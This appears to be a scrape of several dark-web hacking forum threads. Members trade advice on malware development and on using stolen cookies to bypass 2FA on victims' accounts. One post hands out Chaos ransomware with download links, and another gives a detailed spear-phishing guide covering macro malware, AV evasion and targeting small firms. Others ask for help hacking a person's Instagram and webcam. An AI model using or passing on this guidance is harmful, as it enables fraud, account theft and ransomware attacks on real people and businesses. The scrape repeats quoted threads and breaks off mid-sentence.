"(08-16-2020 11:58 AM)the Red Wrote: Please also make a detailed guide about getting started with binary exploitation...  Learning python + assembly be enough for this???  And I am still confused will python be enough for malware development?? Well barebones C(++) isn^t even enough imho. You should study assembly memory and how a computer works if you want to be a good malware dev. Learn about process hollowing. (08-15-2020 10:10 PM)Century Child Wrote: php has some security issues. Today you can use php for normal illegal stuff but you shouldn^t use them for extremely illegal stuff. Or your php code is very safe then it^s no problem but a lot of beginners don^t care about it. thank you but can you be more specific? what are the security issues it has? (08-16-2020 05:21 PM)Err0r Wrote:  (08-15-2020 10:10 PM)Century Child Wrote: php has some security issues. Today you can use php for normal illegal stuff but you shouldn^t use them for extremely illegal stuff. Or your php code is very safe then it^s no problem but a lot of beginners don^t care about it. thank you but can you be more specific? what are the security issues it has? A good example are SQL Injections. It^s easier to have those kind of issues in php than in other languages. How to start hacking?  Why this? I read a lot of posts in the newbie section about this topic and the answers are always the same (""Depends on what you want"") so I decided to create a thread for this answering all the questions.  Like I said: It depends on your goal  So I will talk about a few topics here and how to start. I am not an expert of all hacking topics XD so every member is welcome to edit and improve this thread  Kali Some tutorials require tools. You don^t need to install them manually. There^s a linux distribution called ""Kali"" with about 600 tools preinstalled. Here^s how to install it  But it^s also very blown. Later you should go with a debian and install the tools you need manually to keep it clean.  Testing Environment You need a testing system to test and to attack. How to setup a testing environment   Index A. Malware development B. Web applications C. Binary exploitation D. Database hacking E. Reverse engineering F. (Offline) cracking / bruteforce G. Network hacking  A. Malware development  There are different kinds of malware: Ransomware: Ransomware encrypts all your personal files and wants a ransom to release them. Popular are Wannacry or Petya. The most Ransomwares are based on the same technologies. They are written in C / C++ to run on every (Windows) machine and they use AES and RSA encryption algorithms for security.  Keylogger: It is a small program also written in C / C++ to run on every (Windows) machine to keep the keylogs and get e.g. login data.  Cryptostealer: It is a small program which replaces Cryptoadresses on the victims PC with your own adress.  I will add more (members feel free do edit)   So you definitely have to learn C / C++. You can do it with a book (?k=C+%2F+C%2B%2B&ref=nb_sb_noss) or internet sites (just google). It is also a good idea to have a goal (like developing a keylogger) and google as much as you have what you want. The second point is encryption. Encryption algorithms are very important for malware (not just for ransomware). The best algorithms are AES (_E...n_Standard) and RSA(_(cryptosystem)). AES is symmetrical and RSA asymmetrical (You will know what it is after reading the Wikipedia pages).  A lot of malwares have a server where specific data is sent to (like ransomware keys or keylog files) so you also need to know some languages for server stuff. It is possible to do it in C / C++ but I would not recommend it. Better languages are python or php (but be careful with php and write very secure code it is in security criticism especially for beginners).  Later you have to look at obfuscating to bypass AV^s.  B. Web applications  The most important point of web application hacking is OPSEC (...ight=OPSEC). You need to know how to protect yourself. No a VPN is not enough  The most webpages are based on these technologies and they also cause easy but very dangerous security issues.  SQL: Have a look at SQL Injections: _injection  JavaScript: Have a look at XSS: _scripting . But JavaScript can also endanger your OPSEC that^s why you should e.g. disable JS in Tor Browser and use noscript extension () in Firefox  Have also a look at RCE and CSRF (...st_forgery)  The design stuff is in HTML & CSS.   So learn HTML & CSS JavaScript SQL and php could also be helful. It is also useful to learn python for scanning pages.  I recommend not to start with tools (e.g. nmap wpscan for wordpress sqlmap). Learn some languages and you can have a look at them later.   C. Binary exploitation  D. Database hacking  E. Reverse engineering  F. (Offline) cracking / bruteforce  For (offline) cracking / bruteforce exists basically one way to go. In the most cases you have a hash or a file you want to crack. You don^t have to learn any programming languages for this there are great tools. Hashcat() is very popular and powerful it uses multi-threading and the GPU. For faster cracking you need a faster GPU with a higher hashrate. Use NVIDIA GPU^s because of the compatibility with different tools. Great GPU^s for cracking are the GTX 1080 or GTX 980 ti.   Before start cracking you should have a basic understanding of hashes so read this: ...h_function.  Then you can install hashcat. e.g. on ubuntu:  Code:sudo apt install hashcat After that type hashcat in console:  Code:root@ubuntu:~$ hashcat The output explains the usage you can also see it here: .php?id=hashcat. If you don^t know how to work with the output it might be the best way to google for hashcat tutorials and get into the tool this way.  Happy cracking   G. Network hacking  First let^s talk about programming languages. One of the most important languages (maybe the best) for network hacking is Python. A lot of Network tools are written in Python and there is for beginner network hacking no way around learning it. Python has a lot of network libraries and you don^t have to code everything on your own. Python is a very popular language and there are so many free courses. Just google for ""learning python"". When you^ve learned the basics you should focus on these libraries: requests urllib urllib2 socket twisted and asyncore. For getting into these libraries you can try programming a small chat program between 2 computers via sockets but still learn the basics first.  Here are some projects for beginners: Cracking Wifi: Have a look at aircrack-ng (). It^s a tool to crack wifi passwords via bruteforce (also have a look at F. (Offline) cracking / bruteforce). Follow this official tutorial to crack WPA / WPA2: .php?id=cracking_wpa  Man in the middle: This attack is kind of ruined because of encrypted traffic but it^s still useful to know it. Read about it: _attack.  nmap:  nmap () is a great network scanning tool and indispensable. You can e.g. scan ports of a server or just list all devices in your current network. But it^s still just a scanning tool.  Jammer / Fake AP:  A jammer is something you can write on your own with just a little knowledge of python. This is a tutorial what it is and how to code one: ...am-python/ . But just jamming isn^t very useful maybe for fun but you need a sence. Fluxion () is a tool to get the wifi password of wifis with a lot of users. It^s a jammer but after starting it fluxion creates another wifi with the same name. At e.g. a big motel some users will try your fake wifi because youre jamming the real wifi and you get the real password can I ask you why did you write to be careful with php? what is the security criticism with it? (08-15-2020 05:53 PM)Err0r Wrote: can I ask you why did you write to be careful with php? what is the security criticism with it? php has some security issues. Today you can use php for normal illegal stuff but you shouldn^t use them for extremely illegal stuff. Or your php code is very safe then it^s no problem but a lot of beginners don^t care about it. Thanks for the information much appreciated. Please also make a detailed guide about getting started with binary exploitation...  Learning python + assembly be enough for this???  And I am still confused will python be enough for malware development?? (08-16-2020 11:58 AM)the Red Wrote: Please also make a detailed guide about getting started with binary exploitation...  Learning python + assembly be enough for this???  And I am still confused will python be enough for malware development?? No python is never enough for malware. You should learn C / C++ python only for backend stuff.  I am not an expert in binary exploitation it would be better if any member could edit the post and add something about it. (08-16-2020 02:44 PM)Century Child Wrote:  (08-16-2020 11:58 AM)the Red Wrote: Please also make a detailed guide about getting started with binary exploitation...  Learning python + assembly be enough for this???  And I am still confused will python be enough for malware development?? No python is never enough for malware. You should learn C / C++ python only for backend stuff.  I am not an expert in binary exploitation it would be better if any member could edit the post and add something about it. Thank you Century Child for sparing some time in clarifying the doubt of a newbie"
You might not be able to bypass 2FA if they check the client IP or some kind of identifier/fingerprint like the User-Agent HTTP Header. How do i import cookies to a chromium based browser. i used to use genesis markets extension but i cant seem to locate their new link. here i googled it for you  ...e/cookies/ (06-08-2022 06:32 PM)skillzz Wrote: here i googled it for you  ...e/cookies/ That^s editing deleteing etc. I have downloaded cookies that I meet to import into a browser that way when I log in to the victims account 2fa will likely not be triggered. (06-09-2022 12:38 AM)skrillex Wrote:  (06-08-2022 06:32 PM)skillzz Wrote: here i googled it for you  ...e/cookies/ That^s editing deleteing etc. I have downloaded cookies that I meet to import into a browser that way when I log in to the victims account 2fa will likely not be triggered. same for adding you need to double click then copy paste the key/values (06-09-2022 05:54 PM)skillzz Wrote:  (06-09-2022 12:38 AM)skrillex Wrote:  (06-08-2022 06:32 PM)skillzz Wrote: here i googled it for you  ...e/cookies/ That^s editing deleteing etc. I have downloaded cookies that I meet to import into a browser that way when I log in to the victims account 2fa will likely not be triggered. same for adding you need to double click then copy paste the key/values That doesn^t work on my side. Let me try it on linux
"Before anything else take a step back and think about other ways to solve your issue. Always think out of the box. Take a deep breath and start learning about social engineering and phishing (spear phishing in this case). The vulnerability within the human aspect is the easier to exploit but before you can take advantage on that you gotta learn the goods/bads. Search about those topics and look for books about this subject. I recommend you ""The Ghost in The Wires"" by Kevin Mitnick. That^s gonna give you a high level overview of what you^re looking for. My goal is to basically hack someone and kinda mess with them but first I need the tools and how to do it.   Basically what I first want to do is to get their Instagram password and look through their computer^s camera.  Any help is appreciated (08-08-2021 08:49 AM)here-but-not-here Wrote: My goal is to basically hack someone and kinda mess with them but first I need the tools and how to do it.   Basically what I first want to do is to get their Instagram password and look through their computer^s camera.  Any help is appreciated Welcome to the Forum The first thing I^ll say and I think anyone who has any experience with hacking will agree is that you take deep breath and learn. There is no ""hax.exe"" program you can press to get someone^s password and camera access like in the movies.  Instagram is managed by Facebook which probably has an impenetrable security - if you want their password you^ll have to social engineer them for instance send them a phishing ""reset your password"" email or if you^re close to them simply watch them input it. Some people have a plaintext list of passwords so they don^t forget... It^s stupid but it happens if they have one then find it. Second the camera that^s not going to happen most probably. What computer does he have? Most computers have security against that. MSFVenom reverse shells have a camera option but I doubt it^ll work if his computer is new. That^s something beyond my skillset so it^s definitely beyond yours. Take the time to read on how to do what you want think outside the box. This won^t take 4 google searches this takes time. If you want to use someone else^s script that^s okay but you need to stay safe. That means be untraceable. Yet again it takes reading. I suggest you commence with Jolly Roger??s Security Thread for Beginners as to not replicate errors others have made. Here^s the link:  .html  I don^t condone malicious use of hacking skills but if you^ll do it stay safe.   -Spooky Usually that kind of motivation doesn^t last long it^s easier the anger cools down before you learn how to do something. Or you can hire someone it will be less work lol. There^s no magic button to get people^s accounts. If you just wanna get accounts learn about phishing but it won^t be as easy as you probably think it is. I^d like to know if is important a degree for become a hacker or I can do this by myself. (08-22-2021 01:45 AM)einsteinium252 Wrote: I^d like to know if is important a degree for become a hacker or I can do this by myself.Certs > Degree. University and College mostly is about putting you in debt so you can go be a wage slave for 30+ years. Blackhats are the best hackers by virtue of needing to hack to survive so I guess mentorship by a blackhat will be the best way. But if you hold some good Certs then you^ll be better off than a Computer Science or ^Cybersecurity^ bachelor. You can do it your self but then you^ll spend a lot of time learning through trial and error making the same mistakes people before you have made. It^s better if you can find a mentor or do certs that bring you up to date immediately. But like everything you^re gonna have to pay up and if you don^t know your way around the Dark Net scene you^re bound to get scammed. Thank you for your advice I^m starting in this world I^m beginning to be a newbie and I expect beginning learn here to become a hacker I^m thankful for every you members."
(08-16-2021 01:21 PM)Precarious Wrote: I^m pretty decent at finding and creating exploits with high level programming but I am not shifting my attention from web applications to low level programming. Any expert here can give any tips? I^m not an expert by any mean but I can give you some starting points.  Start by learning C and Assembly.  There^s a great guide by LiveOverflow on YouTube. One note exploit exercises is down as far as I know but there^s pretty good alternative.  If you want to learn more continue with Shellcoder^s Handbook. It^s so good book I had to buy the print version even though I had ebook. I don^t take any responsibility for this but here is a link to this book (simple google search) %20Sh...ndbook.pdf I^m pretty decent at finding and creating exploits with high level programming but I am not shifting my attention from web applications to low level programming. Any expert here can give any tips? (09-03-2021 02:40 PM)thiptin Wrote:  (08-16-2021 01:21 PM)Precarious Wrote: I^m pretty decent at finding and creating exploits with high level programming but I am not shifting my attention from web applications to low level programming. Any expert here can give any tips? I^m not an expert by any mean but I can give you some starting points.  Start by learning C and Assembly.  There^s a great guide by LiveOverflow on YouTube. One note exploit exercises is down as far as I know but there^s pretty good alternative.  If you want to learn more continue with Shellcoder^s Handbook. It^s so good book I had to buy the print version even though I had ebook. I don^t take any responsibility for this but here is a link to this book (simple google search) %20Sh...ndbook.pdf Thanks a lot Your tutorial has been very helpful.
@darknighty3 yes it^s the right place for such things.  Drop me your jabber in PM I will try to help you. (08-12-2021 08:17 PM)darknighty3 Wrote:  (08-12-2021 07:46 PM)anunbuddy1928 Wrote: @darknighty3 yes it^s the right place for such things.  Drop me your jabber in PM I will try to help you. I have no idea what jabber is Just found quick guide for you _eng  if you have any questions I can help you in PM (08-12-2021 07:46 PM)anunbuddy1928 Wrote: @darknighty3 yes it^s the right place for such things.  Drop me your jabber in PM I will try to help you. I have no idea what jabber is Hi I^m very new to Tor The Dark/Deep Web and Hacking.  Long story short I want to hire a hacker to get mainly Videos and Pictures off them or if anything access to any storage accounts they have like Dropbox or Mega. (If you want ethical reassurance the guy is a pedophile. There could be a possibility he has stored his material on his PC but its a long shot)  I already know that Monero is preferred to pay for the service. I^m just trying to figure out how to set up a wallet and buy monero anonymously.  Although like I mentioned I^m not sure if this is the right place to request the service. Would people here be comfortable doing this job?  Finally I^m not even sure if what I^m asking is possible. I know hacking isn^t like the movies but from what Ive seen IRL like the CP2077 hack that happened a few months back it seems possible.  Thanks
"(01-23-2021 10:42 PM)93hacks Wrote: Looking for one book of each to start educating myself in these categories any well respected books or authors to look out for ?. The Web Application Hacker^s Handbook By Dafydd Stuttard ad Marcus Pinto - Great starting point for web app hacking  Blackhat Python by Justin Seitz is very popular.  If you really want to learn about hacking then reading books like ""Modern Operating Systems by Andrew Tanenbaum"" and ""C Programming Language by Brian W. Kernighan and Dennis M. Ritchie"" are the places to go. It^s a lot harder work but you learn so much more at such a more detailed level.  There are also loads of quick and great tutorials on Youtube if you want a very basic starting step and there is no substitution for actually practicing hacking with resources like hackthebox etc. Books in my opinion are hard to grasp and understand when compared to video lectures and labs. You can try to get hold of some udemy or some leaked courses either in form of files or in format of torrents. Looking for one book of each to start educating myself in these categories any well respected books or authors to look out for ?. If I could recommend one and only one book it would be ""Hacking - The Art of Exploitation"".  It is not a book that teaches you how to use tools to exploit software vulnerabilities. It^s a book that will teach you how to think about and write those tools to exploit vulnerabilities in software. Definitely not a book for lazy people  Obviously if you already have some knowledge of the C language this will help a lot.  Regarding Python I recommend that you take a Udemy/Linkedin course. There are lots of free python stuffs on Youtube too. But my final advice is to pay special attention to C first before Python or any other language. A good introduction to hacking techniques is Penetration Testing: A Hands-On Introduction to Hacking. An excellent Python reference is Fluent Python. There^s a good list Python books from no starch press:    (07-11-2021 11:52 PM)90513D Wrote: Blackhat Python by Justin Seitz is very popular. Yeah and the 2nd edition just launched too"
Hi guys this is my second share with you dont forget to try in virtual machine   Chaos ransomware is multi language ransomware which means you can translate your note to any language. This Ransomware encrypts all files and drops a note for every folder in which files have been encrypted. You can overwrite all files or encrypt them with aes/rsa encryption method. Create your decrypter using the advanced option. Public and private keys will be created automatically. Keep private key and decrypter. Without them files cannot be returned.This project depends on your donation. Please donete if you want to see next releases in the future  bitcoin: bc1qlnzcep4l4ac0ttdrq7awxev9ehu465f2vpt9x0 monero :44wJKzwrzWY7dxLov4EjVia3wmwaj6ige6a8C6eHKXKtVy8PTU3SnCG6A6do3vL4Cu3kLUedKwjomDKe754QhshVJw52xFV Download links:  https://ufile.io/pj1xxc6f  .tr/d/9fjbJH8xtngnjw https://www.file.io/download/czdPPaKabdwG https://mega.nz/file/jDBjHShT#4fHf4YSfky...N29QuVVI_8 Interesting - sounds useful but wouldn^t a tool that is publicly available be crippled pretty rapidly? Is your source code available? What systems can it be executed against? Are there architecture limitations? I admittedly have not downloaded your tool. (07-06-2021 11:58 PM)chiefnu Wrote: Interesting - sounds useful but wouldn^t a tool that is publicly available be crippled pretty rapidly? Is your source code available? What systems can it be executed against? Are there architecture limitations? I admittedly have not downloaded your tool. I can sell source code if you are interested (07-04-2021 02:29 AM)Garuga Wrote:  (07-03-2021 08:51 PM)Chaosx Wrote: wth posts must be unique? It^s not about the uniqueness of the post it^s about the content that you post. If your post has nothing special compared to the public sources it does not really have value. Congrats on your promotion mate. (07-04-2021 03:58 PM)BGrabbit Wrote: Congrats on your promotion mate. Thank you very much but please stay on topic. (07-03-2021 08:51 PM)Chaosx Wrote: wth posts must be unique? It^s not about the uniqueness of the post it^s about the content that you post. If your post has nothing special compared to the public sources it does not really have value. video tutorial about how to use decrypter.  (07-03-2021 08:51 PM)Chaosx Wrote:  (07-03-2021 08:38 PM)Cyberjagu Wrote: this same thread i saw at many platform like torigon and dread too wth posts must be unique? :Shy: Who want to burn a VM ? :Shy: (07-03-2021 08:38 PM)Cyberjagu Wrote: this same thread i saw at many platform like torigon and dread too wth posts must be unique? this same thread i saw at many platform like torigon and dread too
Nice Hi guys.I am new here and I want to share with you new ransomware with many functions. Chaos Ransomware is multi language ransomware. You can translate dropped file name and your note to any language. You can grant admin privileges delete all volumes shadow copies delete backup catalog and disable windows recovery mode. It overwrites all files on the computer (It means nobody can ever return files back) and makes it at least 2 times faster than other ransomwares. It drops read_it.txt(you can change dropped file name for example something.txt) for startup folder and all folders which files has been encrypted Don^t forget to try it on virtual machine  Download links https://mega.nz/file/DXxUQLAT#C8iahgpJp  https://ufile.io/kv14aef5  (06-21-2021 09:03 AM)Chaosx Wrote: Hi guys.I am new here and I want to share with you new ransomware with many functions. Chaos Ransomware is multi language ransomware. You can translate dropped file name and your note to any language. You can grant admin privileges delete all volumes shadow copies delete backup catalog and disable windows recovery mode. It overwrites all files on the computer (It means nobody can ever return files back) and makes it at least 2 times faster than other ransomwares. It drops read_it.txt(you can change dropped file name for example something.txt) for startup folder and all folders which files has been encrypted Don^t forget to try it on virtual machine  Download links https://mega.nz/file/DXxUQLAT#C8iahgpJp  https://ufile.io/kv14aef5  my personal opinion is that those looking for malicious ransomware are trying to reach a 360 degree project In other words if these ransomware are offered thanks to the panel where all their needs will be together more added value can be achieved. No readme or instructions Has soon has i can I will check it out. Thank you. check this out guys new version is here .php?tid=4238
"Hi guys. I read and really appreciate what you wrote about phishing on the forum. Especially while reading I realized that I still have a lot to learn. What I would like to ask is is it possible to steal accounts for example paypal through phishing methods. I have tried with tools such as zphisher but it is quite difficult and my results are quite disappointing.   Sorry if my question disturbs you I^m new and self-taught I learn every day alone in front of my PC but without a guide I stall a lot. All resources that you could propose me help me in my learning also for I am the kind to ask a lot of question hihi . Thank you  .   (04-14-2021 07:04 PM)terricorley Wrote: can anyone help me with good smtp/good smtp method.i^ve been using many smtps like officeregister1&1 butbthese detecting my content and not allowing to send to inbox can anyone help me with good smtp/good smtp method.i^ve been using many smtps like officeregister1&1 butbthese detecting my content and not allowing to send to inbox (04-14-2021 07:04 PM)terricorley Wrote: can anyone help me with good smtp/good smtp method.i^ve been using many smtps like officeregister1&1 butbthese detecting my content and not allowing to send to inbox [] [] [] -- I M P O R T A N T -- [] [] [] NEVER SPAM YOUR E-MAILS AS THIS WILL BE NOTICED BY ANTI-VIRUS AND YOUR E-MAILS + DOCUMENTS + MALWARE WILL BE ADDED TO THEIR DATABASE TO FUCK US OVER.  ALWAYS USE SPEAR PHISHING AS THIS IS THE MOST EFFECTIVE TECHNIQUE  ALWAYS TARGET LOCALLY INSTEAD OF GLOBALLY. TARGET SMALL-MEDIUM COMPANIES IN YOUR NEAR VISCINITY - NEVER TARGET THE BIG STORES THAT HAVE AN IT DEPARTMENT - ALWAYS TARGET COMPANIES WITHOUT AN IT DEPARTMENT.  AGAIN DON^T SPAM YOUR SHIT AS THIS IS BAD FOR BUSINESS AND MAKES IT HARDER FOR US AND THE MALWARE DEVELOPERS  KEEP EVERYTHING LOW KEY -- TARGETED AND MAKE YOUR SHIT LOOK VERY PROFESSIONAL  --[Prerequisites]------------------------------------------------------------------------------------ _Rogers_Se...inners.pdf  --[Cred Phishing Host your Phishing site on your VPS. Connect to your VPS and E-Mails service with Whonix or Tails via SSH and pay for those services with XMR or BTC.  When you gain Creds of the target you are spearphishing you probably won^t be able to log in since these big companies like Google Facebook Twitter etc. Send E-Mails to your clients notifing them that someone has logged into their account.   You could try to reset the password but more than likely you will get fucked by MFA. So it^s probably not worth it unless you want the passwords of a small-company- E-Mail password.  So Cred Phishing probably isn^t worth it unless you are impersonating a business or business employee  --[SMTP Don^t spoof your phishing E-Mails. It will be detected by the E-Mail provider because scanners will see that your E-Mail Headers and the invisible Forms you send with your E-Mail do not match and your E-Mail will not send.  [0]   Use a VPS to host your shit and make a legit Business E-Mail to send your shit. Pay with XMR or BTC.  Your Target: example@ Your E-Mail: example@ Your Phishing Domain:   --[Sending To Inbox Certain Files get blocked by E-Mail providers like Gmail Yahoo Protonmail etc. etc. Currently APTs use a plethora of tactics to gain access to systems (and profit) but one of those ways which is effective is using Word/Excel Documents with macros to download your malware you have hosted on your VPS/Server.  [0]   --[Bypassing AV To bypass AV try using tools like Unicorn and EvilClippy/  [1]  [2] ...stant.html  Other people are profiting as well but are idiots that spam their shit or they are not using the proper precautions to make sure their phishing pages take longer to discover. Never spam your E-Mails/Messages [] don^t fuck it up for the rest of us.   The following resource shows you what other people are doing. These are people that have been detected by web-crawlers scan the internet for phishing pages.  [3]   A tactic you can use to make sure your phishing page does not/takes longer to detect is to add captchas to your credential phishing page or add a ""please wait whilst we scan your browser"" page. This way you make it harder for crawlers to detect your shit.  --[Windows and MacOSX You have spearphished a company or individual. Your macro went undetected and your malware is downloaded. That^s great but if the individual you are targeting is using Windows or MacOS results will be different and you might now be able to profit.  Windows: If your target is using Windows good news you have won the lotery. Assuming your malware is FUD and your macro bypasses Windows Defender you can now profit depending on the type of macro you supplied your client with.  MacOS: You^re fucked. Your malware will not execute because it will be placed in a sandbox and you macro won^t be able to use the system files to actually do it^s job and connect to your C2 Server. There is a way to bypass this sandbox but I have not been able to do this yet.   [] ...-macOS.pdf Youtube search for this black hat talk on this. Try to bypass this on your own as you will learn a lot of shit about how computers actually work and stuff.   Contact admins on this forum with PGP if you want to buy their methods to bypass this sandbox. Please use proper OpSec contacting anyone on the Dark Net and never reveal anything about yourself. Always talk like the entire world can see the message you^re sending to someone.  --[How To Profit Make your document look legit and tailor it to the target you^re spearphishing. Avoid doing this via E-Mail if you can. Actually hack their WiFi Network with a directional antenna and MiTM them to your landing page so they will download your malware. This has a higher change of success.   Use these templates to make SE people into running your macros.  [] ...2-feature/ [] ?q=malicous...+%22apt%22  You can use the following services to crack .cap files.  [4] Hashcrack [5] GPUHashMe [6] HashC (?)  Otherwise you can send a spear-phishing E-Mail. Google for news about APTs and Governments using spear-phishing to compromise targets and imitate their tactics because if they can send Word documents to Governments and Big IT Companies like Apple and Twitter and compromise them profiting sometimes more than $1 million with a single attack. Then you can for sure use their techniques to hack the small bakery across your street.  [7] ...ent-threat  You can ask me any questions you have or you can correct my dumb ass if I have made some errors but this has worked for me (a little). Thanks. (04-14-2021 07:04 PM)terricorley Wrote: can anyone help me with good smtp/good smtp method.i^ve been using many smtps like officeregister1&1 butbthese detecting my content and not allowing to send to inbox I have heard very good references for using the ""shared Doc"" bait. Before going to the real doc hosted on the drive the target has to login to view the doc (cloned login) most fall for it and input their pass (the login must have the targets info and profile picture to make it look trustworthy). Important thing is to send the link in the 2nd/3rd email (not on the 1st) as once you already have sent one email and got a reply from the target a ""trust"" is established. After this the email with the link will always head to the the targets inbox. try this https://xuid.ru/other-service-smtp.php (04-15-2021 11:16 AM)hukstd Wrote:  (04-14-2021 07:04 PM)terricorley Wrote: can anyone help me with good smtp/good smtp method.i^ve been using many smtps like officeregister1&1 butbthese detecting my content and not allowing to send to inbox [] [] [] -- I M P O R T A N T -- [] [] [] NEVER SPAM YOUR E-MAILS AS THIS WILL BE NOTICED BY ANTI-VIRUS AND YOUR E-MAILS + DOCUMENTS + MALWARE WILL BE ADDED TO THEIR DATABASE TO FUCK US OVER.  ALWAYS USE SPEAR PHISHING AS THIS IS THE MOST EFFECTIVE TECHNIQUE  ALWAYS TARGET LOCALLY INSTEAD OF GLOBALLY. TARGET SMALL-MEDIUM  ... [7] ...ent-threat  You can ask me any questions you have or you can correct my dumb ass if I have made some errors but this has worked for me (a little). Thanks.Thanks for the lesson...like to learn a lot from you...new to phishing...surely gonna mail directly (04-21-2021 09:50 PM)mokuhtfesa Wrote: Hi guys. I read and really appreciate what you wrote about phishing on the forum. Especially while reading I realized that I still have a lot to learn.Me too man. I^m getting there tho. The courses @hide.ir helped me out a lot   (04-21-2021 09:50 PM)mokuhtfesa Wrote: What I would like to ask is is it possible to steal accounts for example paypal through phishing methods. I have tried with tools such as zphisher but it is quite difficult and my results are quite disappointing.Yes it^s possible. That^s how most of it is done now. People aren^t hacking Paypal to get that info. People are hacking people. To accomplish your task use SET or one of the tools listed you can find with <""phishing tools"" intitle:list>   (04-21-2021 09:50 PM)mokuhtfesa Wrote: Sorry if my question disturbs you I^m new and self-taught I learn every day alone in front of my PC but without a guide I stall a lot.No worries I^m not an elitist and I^m probably closer to you than to any elite hacker on here."
"(04-03-2021 09:09 AM)n0yvern Wrote:  (04-02-2021 10:29 AM)INTERPOL Wrote: Author :- Nikhil Parekh  Requirements ?? Open Mind and Willingness to Implement ?? Notebook or Journal to Take Lots of Notes  Course Content ?? Understand What Undetectable Malware is ?? Learn How to Install Python and Pip ?? Install the Veil Framework ?? Understand the Gnome Desktop ?? Install Wine Mono ?? Learn How to Install Metasploit ?? Test the MSF Console ?? Create an Exploit with Veil ?? Test the Exploit on a Windows 10 Machine ?? How to Encrypt the Payload to Avoid Detection ?? Discover How Hackers Take Control of Webcams Modify Documents and Much More  ?? Source Link :-   download link : https://mega.nz/folder/ojpmlCCZ#8CR38iGbIBPDryl7krVYZQ >undetectable malware >veil evasion tool + metasploit  sorry mate but I need to stop you right there veil evasion is clearly not enough to evade security programs let alone combined with metasploit that has probably been reversed many times since it was created.Yeah this seems very beginner oriented. Real ""undetectable"" malware is a rootkit but veil and meterpreter is good enough for beginners wanting to learn AV bypass. Combine payload with something like shellter and you will bypass most AV. You don^t have to bypass ALL AV just some. if you can code very well and do good reversing you will know how to develop a nice malware also read many leaked sources of nice malwares such as carberb tiny nuke zeus cerberus etc... (04-05-2021 05:28 PM)Nemmex Wrote: sorry mate but I need to stop you right there veil evasion is clearly not enough to evade security programs let alone combined with metasploit that has probably been reversed many times since it was created.  pre-note: I^m using ""you"" as meaning anyone/everyone/someone reading  Realistically it won^t. It^ll be blocked as soon as it runs. Also I^m betting all my money that it doesn^t even explain what^s happening it^s probably like ""copy and paste this command and replace output.exe with a name you want"" (to read with either heavy Indian or south-mid American accent)  I honestly think that the reason many don^t make it it^s because beginners are mostly given old obsolete tools and methodologies said to be ""beginner friendly"" just because they would never fucking work in the real world. Therefore you^d have to go way out of your way to get a proper education something not only many wouldn^t know (thinking they are receiving good education) but most won^t even have the will or motivation to do so. Not to mention the tons of ""courses"" or ""universities"" (yes I have seen some stuff from unis which is embarrassing) that spread false ""knowledge"". It really pisses me off we end up with kids on tiktok called ""hackers"" because they got an ip from omegle.  PS: you will never ever find a decent (not even good just decent) course on udemy the whole site is basically a technically legal scam. If you are currently preparing a course for that site just stop someone else already posted an identical course probably. Couldn^t agree more with @Nemmex tbh  There is a whole industry of shitty infosec material and content out there being pumped out  There are plenty of quality resources though some of which will be out of date of course but still good from a learning perspective  And tbh I personally learnt a lot from messing round with and learning legit stuff that doesn^t on the face of it have anything to do with hacking just how computer hardware and software work in general and then trying to experiment  Honestly there is no short cuts with learning this stuff...if it was that easy we could all do an udemy course and be leet (04-06-2021 03:09 AM)cyphrguy1173 Wrote:  (04-05-2021 08:57 PM)LongPig Wrote: best way to create a malware its to code it starting from zero without reusing code to avoid signatures use polymorphism using dynamic imports or avoid winapi encrypting strings and packing using a crypter/packer with a loadpe atombombing heavens gate or a vm even junk code can help in static detections but there are so many tips... I^ve never done malware development but I^m taking a hint that if you really wanted you can bypass almost any anti-virus software just by implementing and doing stuff yourself. E.g: implementing your own encryption algorithm inside of the program to obfuscate itself instead of depending on Window^s API. yeah thats what i mean by coding from zero. (04-05-2021 08:57 PM)LongPig Wrote: best way to create a malware its to code it starting from zero without reusing code to avoid signatures use polymorphism using dynamic imports or avoid winapi encrypting strings and packing using a crypter/packer with a loadpe atombombing heavens gate or a vm even junk code can help in static detections but there are so many tips... I^ve never done malware development but I^m taking a hint that if you really wanted you can bypass almost any anti-virus software just by implementing and doing stuff yourself. E.g: implementing your own encryption algorithm inside of the program to obfuscate itself instead of depending on Window^s API. best way to create a malware its to code it starting from zero without reusing code to avoid signatures use polymorphism using dynamic imports or avoid winapi encrypting strings and packing using a crypter/packer with a loadpe atombombing heavens gate or a vm even junk code can help in static detections but there are so many tips... (04-04-2021 05:55 AM)hagbardceline Wrote:  (04-03-2021 09:09 AM)n0yvern Wrote:  (04-02-2021 10:29 AM)INTERPOL Wrote: Author :- Nikhil Parekh  Requirements ?? Open Mind and Willingness to Implement ?? Notebook or Journal to Take Lots of Notes  Course Content ?? Understand What Undetectable Malware is ?? Learn How to Install Python and Pip ?? Install the Veil Framework ?? Understand the Gnome Desktop ?? Install Wine Mono ?? Learn How to Install Metasploit ?? Test the MSF Console ?? Create an Exploit with Veil ?? Test the Exploit on a Windows 10 Machine ?? How to Encrypt the Payload to Avoid Detection ?? Discover How Hackers Take Control of Webcams Modify Documents and Much More  ?? Source Link :-   download link : https://mega.nz/folder/ojpmlCCZ#8CR38iGbIBPDryl7krVYZQ >undetectable malware >veil evasion tool + metasploit  sorry mate but I need to stop you right there veil evasion is clearly not enough to evade security programs let alone combined with metasploit that has probably been reversed many times since it was created.Yeah this seems very beginner oriented. Real ""undetectable"" malware is a rootkit but veil and meterpreter is good enough for beginners wanting to learn AV bypass. Combine payload with something like shellter and you will bypass most AV. You don^t have to bypass ALL AV just some. pre-note: I^m using ""you"" as meaning anyone/everyone/someone reading  Realistically it won^t. It^ll be blocked as soon as it runs. Also I^m betting all my money that it doesn^t even explain what^s happening it^s probably like ""copy and paste this command and replace output.exe with a name you want"" (to read with either heavy Indian or south-mid American accent)  I honestly think that the reason many don^t make it it^s because beginners are mostly given old obsolete tools and methodologies said to be ""beginner friendly"" just because they would never fucking work in the real world. Therefore you^d have to go way out of your way to get a proper education something not only many wouldn^t know (thinking they are receiving good education) but most won^t even have the will or motivation to do so. Not to mention the tons of ""courses"" or ""universities"" (yes I have seen some stuff from unis which is embarrassing) that spread false ""knowledge"". It really pisses me off we end up with kids on tiktok called ""hackers"" because they got an ip from omegle.  PS: you will never ever find a decent (not even good just decent) course on udemy the whole site is basically a technically legal scam. If you are currently preparing a course for that site just stop someone else already posted an identical course probably. (04-02-2021 10:29 AM)INTERPOL Wrote: Author :- Nikhil Parekh  Requirements ?? Open Mind and Willingness to Implement ?? Notebook or Journal to Take Lots of Notes  Course Content ?? Understand What Undetectable Malware is ?? Learn How to Install Python and Pip ?? Install the Veil Framework ?? Understand the Gnome Desktop ?? Install Wine Mono ?? Learn How to Install Metasploit ?? Test the MSF Console ?? Create an Exploit with Veil ?? Test the Exploit on a Windows 